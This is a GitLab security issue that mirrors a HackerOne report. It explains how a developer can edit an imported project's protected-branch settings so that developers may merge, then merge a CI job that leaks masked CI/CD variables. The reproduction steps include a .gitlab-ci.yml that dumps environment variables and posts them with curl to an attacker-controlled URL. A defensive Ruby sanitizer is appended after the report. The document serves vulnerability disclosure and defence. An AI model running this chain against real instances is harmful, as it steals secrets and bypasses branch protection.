  • #353958
Closed
Open
Issue created Mar 01, 2022 by GitLab SecurityBot (@gitlab-securitybot), Reporter

User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project

HackerOne report #1485381 by justas_b on 2022-02-18, assigned to @nmalcolm:


Report

Hello,

Summary

A user with the developer role (group) can steal masked group/project CI/CD variables by modifying the Project settings -> Protected branches -> Allowed to merge setting on an imported project (tree/project/protected_branches.ndjson file).

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

secretvar_masked.png

  3. Create a personal project with account B and export it
  4. Invite account B (developer) to account A's (owner) group
  5. With account B, modify the project import file: go to tree/project/protected_branches.ndjson
  6. Change the "merge_access_levels":[{"access_level":}] value to 30 if it's 40

merge_access_levels_30.png

  7. Upload the modified project to account A's group with account B
  8. By default, only maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40 - 40 = maintainer, 30 = developer, etc.)
  9. Create a new branch with account B (developer)
  10. Add the following .gitlab-ci.yml file to the newly created branch and create a merge request

```yaml
image: ruby:latest

job_name2:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
```

new_branch_malicious_gitlab_ci_yml.png

[REDACTED]

  11. Merge the newly created branch into the main (protected) branch (with account B - developer)

merge_to_protected_as_developer.png

  12. A pipeline run against a protected branch will send sensitive data to the attacker's website using curl

[REDACTED]

The impact is pretty similar to my other report #1256017

What is the current bug behavior?

It is possible to modify the "merge_access_levels":[{"access_level":}] value on imported projects

What is the expected correct behavior?

The "merge_access_levels":[{"access_level":}] value should always be the default, 40


Output of checks

This bug happens on GitLab.com

Impact

A user with the developer role (group) can steal masked group and project CI/CD variables. A developer can also modify the main branch without a maintainer's permission.

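As an added defensive example (not GitLab's own code and not part of the report above): a Ruby check that normalizes the access levels in an exported protected_branches.ndjson to maintainer (40) before the file is imported, and reports every entry that had been lowered. The file path and the numeric role values (40 = maintainer, 30 = developer) are those named in the report; the sample lines are constructed.

```ruby
# Added example, not GitLab code: sanitize tree/project/protected_branches.ndjson
# from a project export so that no merge or push access level on a protected
# branch is below MAINTAINER (40), the default the report says is expected.
require 'json'

MAINTAINER = 40
ACCESS_KEYS = %w[merge_access_levels push_access_levels].freeze

# Returns [sanitized_lines, findings]. Each finding records the branch name,
# the key whose level was below maintainer, and the value that was found.
def sanitize_protected_branches(ndjson)
  findings = []
  sanitized = ndjson.each_line.map do |line|
    line = line.strip
    next nil if line.empty?
    branch = JSON.parse(line)
    ACCESS_KEYS.each do |key|
      Array(branch[key]).each do |entry|
        level = entry['access_level']
        # Only numeric role levels are checked; a missing level is left untouched.
        next unless level.is_a?(Integer) && level < MAINTAINER
        findings << { name: branch['name'], key: key, found: level }
        entry['access_level'] = MAINTAINER
      end
    end
    JSON.generate(branch)
  end.compact
  [sanitized, findings]
end

# Constructed sample: "main" has been lowered so developers (30) may merge,
# "release" still carries the maintainer-only default.
SAMPLE_NDJSON = <<~NDJSON
  {"name":"main","merge_access_levels":[{"access_level":30}],"push_access_levels":[{"access_level":40}]}
  {"name":"release","merge_access_levels":[{"access_level":40}],"push_access_levels":[{"access_level":40}]}
NDJSON

if __FILE__ == $PROGRAM_NAME
  lines, findings = sanitize_protected_branches(SAMPLE_NDJSON)
  findings.each { |f| warn "#{f[:name]}: #{f[:key]} was #{f[:found]}, reset to #{MAINTAINER}" }
  puts lines
end
```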

Edited Jun 02, 2022 by Nick Malcolm